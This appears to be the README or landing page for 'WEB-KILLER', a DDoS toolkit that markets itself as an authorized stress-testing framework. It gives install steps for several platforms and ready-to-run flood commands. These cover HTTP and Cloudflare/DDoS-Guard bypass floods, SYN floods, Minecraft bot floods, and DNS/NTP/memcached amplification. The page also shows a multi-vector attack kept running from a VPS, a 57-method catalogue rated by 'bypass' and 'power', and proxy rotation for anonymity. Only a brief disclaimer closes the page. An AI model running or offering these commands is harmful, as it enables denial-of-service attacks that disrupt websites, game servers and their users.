Ultimate DDoS Attack Toolkit for Security Professionals
A comprehensive network stress testing framework for authorized security assessments
Designed for penetration testers, security researchers, and network administrators to test infrastructure resilience against DDoS attacks.
Comprehensive arsenal covering Layer 7 (HTTP/HTTPS), Layer 4 (TCP/UDP), and amplification attacks.
Advanced techniques to bypass Cloudflare, DDoS-Guard, AWS Shield, Akamai, and more.
Fully supported on Windows, Linux, macOS, and Android (Termux). Run anywhere.
Live PPS, BPS, CPU, and RAM monitoring during attacks with 3D visualization.
Automatic proxy downloading, validation, and rotation with HTTP, SOCKS4, SOCKS5 support.
Everything you need for professional network stress testing
HTTP/HTTPS flood attacks including GET, POST, Cloudflare bypass, DDoS-Guard bypass, bot simulation, and more.
TCP/UDP/SYN/ICMP floods targeting servers, game services, and network infrastructure.
DNS (54x), NTP (556x), Memcached (51,000x), CLDAP (70x) amplification attacks.
Dedicated methods for Minecraft, FiveM, TeamSpeak 3, and Valve Source servers.
Ping scanner, GeoIP lookup, network monitor, site checker, DNS resolver, and more.
Beginner-friendly menu interface for easy attack configuration without memorizing commands.
Get WEB-KILLER running in minutes on any platform
winget install Python.Python.3.11
Or download from python.org
✅ Check "Add Python to PATH"
winget install Git.Git
cd Desktop
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER
pip install -r requirements.txt
python launcher.py
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install python3 python3-pip python3-dev git build-essential -y
# Clone and install
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER
pip3 install -r requirements.txt
# Run
python3 launcher.py
# Install Homebrew
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
# Install Python & Git
brew install python@3.11 git
# Clone and install
cd ~/Desktop
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER
pip3 install -r requirements.txt
# Run
python3 launcher.py
# Update packages
pkg update && pkg upgrade -y
# Install requirements
pkg install python python-pip git -y
# Clone and install
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER
pip install -r requirements.txt
# Run (non-RAW methods only)
python run.py HELP
# Connect via SSH
ssh root@your-vps-ip
# One-liner setup
apt update && apt install python3 python3-pip git screen -y
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER
pip3 install -r requirements.txt
# Run in screen (keeps running after disconnect)
screen -S attack
python3 run.py GET http://target.com 0 1000 proxies.txt 100 3600
# Detach: Ctrl+A then D | Reattach: screen -r attack
Complete tutorial on how to use WEB-KILLER effectively
| Attack Type | Command Format |
|---|---|
| Layer 7 | python run.py <method> <url> <proxy_type> <threads> <proxy_file> <rpc> <duration> [debug] |
| Layer 4 | python run.py <method> <ip:port> <threads> <duration> [proxy_type] [proxy_file] |
| Amplification | python run.py <method> <ip:port> <threads> <duration> <reflector_file> [debug] |
# Attack a website with GET flood
# 500 threads, 50 requests per connection, 60 seconds
python run.py GET http://example.com 0 500 proxies.txt 50 60
Breakdown:
GET - HTTP GET methodhttp://example.com - Target URL0 - Use all proxy types500 - Number of concurrent threadsproxies.txt - Proxy list file50 - Requests per connection (RPC)60 - Duration in seconds
# Bypass Cloudflare protection
# Use SOCKS5 proxies, 800 threads, 10 minutes
python run.py CFB https://protected-site.com 5 800 socks5.txt 80 600 debug
Tips:
CFB for standard CloudflareCFBUAM for Under Attack Modedebug flag to see real-time stats
# Minecraft Java Edition server
python run.py MINECRAFT mc.server.com:25565 20 300
# Minecraft bot flood with login
python run.py MCBOT play.server.com:25565 50 600 5 socks5.txt
# DNS amplification (54x traffic amplification)
# Requires reflector servers list
python run.py DNS target.com:53 10 300 dns_reflectors.txt debug
Amplification attacks require a list of vulnerable reflector servers. These methods need RAW socket access (root/admin).
# Terminal 1: Layer 7 HTTP/2 attack
python run.py STOMP https://target.com 5 1000 socks5.txt 100 3600 &
# Terminal 2: Layer 4 SYN flood (requires sudo)
sudo python run.py SYN target.com:443 100 3600 &
# Terminal 3: DNS amplification
sudo python run.py DNS target.com:53 10 3600 dns_servers.txt &
# Terminal 4: Monitor with DSTAT
python run.py TOOLS
# Launch the beginner-friendly menu
python launcher.py
# Menu Options:
# [1] Layer7 Attack - Step-by-step HTTP configuration
# [2] Layer4 Attack - TCP/UDP attack setup
# [3] Amplification - AMP attack setup
# [4] Tools Console - Network utilities
# [5] View Help - Usage reference
# [6] Stop All Attacks - Emergency stop
| Code | Type | Best For |
|---|---|---|
| 0 | ALL | Maximum variety |
| 1 | HTTP | Layer 7 attacks |
| 4 | SOCKS4 | TCP connections |
| 5 | SOCKS5 | Best anonymity |
| 6 | RANDOM | Auto-selection |
Complete reference of all 57 attack methods
| # | Method | Description | Bypass | Power |
|---|---|---|---|---|
| 1 | GET | Standard HTTP GET flood | ⭐⭐ | ⭐⭐⭐ |
| 2 | POST | HTTP POST with JSON payload | ⭐⭐ | ⭐⭐⭐⭐ |
| 3 | HEAD | HTTP HEAD request flood | ⭐ | ⭐⭐ |
| 4 | CFB | Cloudflare bypass | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ |
| 5 | CFBUAM | Cloudflare UAM bypass | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ |
| 6 | BYPASS | General WAF bypass | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ |
| 7 | OVH | OVH-specific attack | ⭐⭐⭐ | ⭐⭐⭐⭐ |
| 8 | STRESS | High-stress POST flood | ⭐⭐ | ⭐⭐⭐⭐⭐ |
| 9 | DYN | Dynamic host attack | ⭐⭐⭐⭐ | ⭐⭐⭐ |
| 10 | SLOW | Slowloris-style attack | ⭐⭐⭐ | ⭐⭐⭐ |
| 11 | NULL | Null user agent attack | ⭐⭐⭐ | ⭐⭐ |
| 12 | COOKIE | Cookie manipulation | ⭐⭐⭐ | ⭐⭐⭐ |
| 13 | PPS | High packets per second | ⭐⭐ | ⭐⭐⭐⭐⭐ |
| 14 | EVEN | Even connection attack | ⭐⭐⭐ | ⭐⭐⭐ |
| 15 | GSB | Google Safe Browsing | ⭐⭐⭐ | ⭐⭐⭐ |
| 16 | DGB | DDoS-Guard bypass | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐ |
| 17 | AVB | Anti-virus bypass | ⭐⭐⭐⭐ | ⭐⭐⭐ |
| 18 | APACHE | Apache Range attack | ⭐⭐⭐ | ⭐⭐⭐⭐ |
| 19 | XMLRPC | WordPress XML-RPC | ⭐⭐ | ⭐⭐⭐⭐ |
| 20 | BOT | Search engine bot flood | ⭐⭐⭐⭐ | ⭐⭐⭐ |
| 21 | BOMB | HTTP/2 bombardier | ⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ |
| 22 | DOWNLOADER | Slow download attack | ⭐⭐⭐ | ⭐⭐⭐ |
| 23 | KILLER | Process spawner | ⭐⭐ | ⭐⭐⭐⭐⭐ |
| 24 | TOR | Tor network attack | ⭐⭐⭐⭐⭐ | ⭐⭐⭐ |
| 25 | RHEX | Random hex attack | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ |
| 26 | STOMP | HTTP/2 stomp attack | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ |
| # | Method | Protocol | Description |
|---|---|---|---|
| 1 | TCP | TCP | TCP connection flood |
| 2 | UDP | UDP | UDP packet flood |
| 3 | SYN | TCP | SYN packet flood (RAW socket) |
| 4 | ICMP | ICMP | Ping flood (RAW socket) |
| 5 | VSE | UDP | Valve Source Engine query |
| 6 | TS3 | UDP | TeamSpeak 3 server flood |
| 7 | MCPE | UDP | Minecraft PE flood |
| 8 | FIVEM | UDP | FiveM server query |
| 9 | FIVEM-TOKEN | UDP | FiveM token attack |
| 10 | MINECRAFT | TCP | Minecraft server flood |
| 11 | MCBOT | TCP | Minecraft bot flood (with login) |
| 12 | CONNECTION | TCP | Connection flood |
| 13 | CPS | TCP | Connections per second |
| 14 | OVH-UDP | UDP | OVH UDP custom flood |
| # | Method | Port | Amplification Factor |
|---|---|---|---|
| 1 | DNS | 53 | 28-54x |
| 2 | NTP | 123 | 556x |
| 3 | MEM | 11211 | 10,000-51,000x |
| 4 | CLDAP | 389 | 56-70x |
| 5 | CHAR | 19 | 356x |
| 6 | RDP | 3389 | 86x |
| 7 | ARD | 3283 | 75x |
| # | Tool | Type | Description |
|---|---|---|---|
| 1 | PING | Tool | ICMP ping utility |
| 2 | CHECK | Tool | Website status checker |
| 3 | INFO | Tool | GeoIP information lookup |
| 4 | TSSRV | Tool | TeamSpeak server lookup |
| 5 | DNS | Tool | DNS resolution tool |
| 6 | CFIP | Tool | Cloudflare IP resolver |
| 7 | DSTAT | Tool | Network statistics monitor |
Complete reference documentation for WEB-KILLER
Step-by-step guide for beginners. Learn how to install, configure, and launch your first attack.
Read Guide →Detailed explanation of config.json, proxy providers, and advanced settings.
View Config →Complete documentation of all 57 attack methods with parameters and examples.
View Methods →Common issues and solutions. Fix installation problems, performance issues, and errors.
Get Help →
{
"proxy-providers": [
{
"url": "https://api.proxyscrape.com/v2/?request=getproxies&protocol=http",
"type": 1,
"timeout": 30
},
{
"url": "https://www.proxy-list.download/api/v1/get?type=socks5",
"type": 5,
"timeout": 30
}
],
"MCBOT": "WEBKILLER_",
"MINECRAFT_DEFAULT_PROTOCOL": 754
}
pip install --upgrade pip
pip install -r requirements.txt
# Or install directly:
pip install git+https://github.com/MatrixTM/PyRoxy.git
Windows: Run CMD as Administrator
Linux/Mac: Use sudo
sudo python3 run.py SYN target.com:80 50 60
--threads 1000WEB-KILLER is designed EXCLUSIVELY for:
MUST NOT be used for:
Violators may face criminal prosecution under 18 U.S.C. § 1030 with up to 10 years imprisonment and $250,000 fines.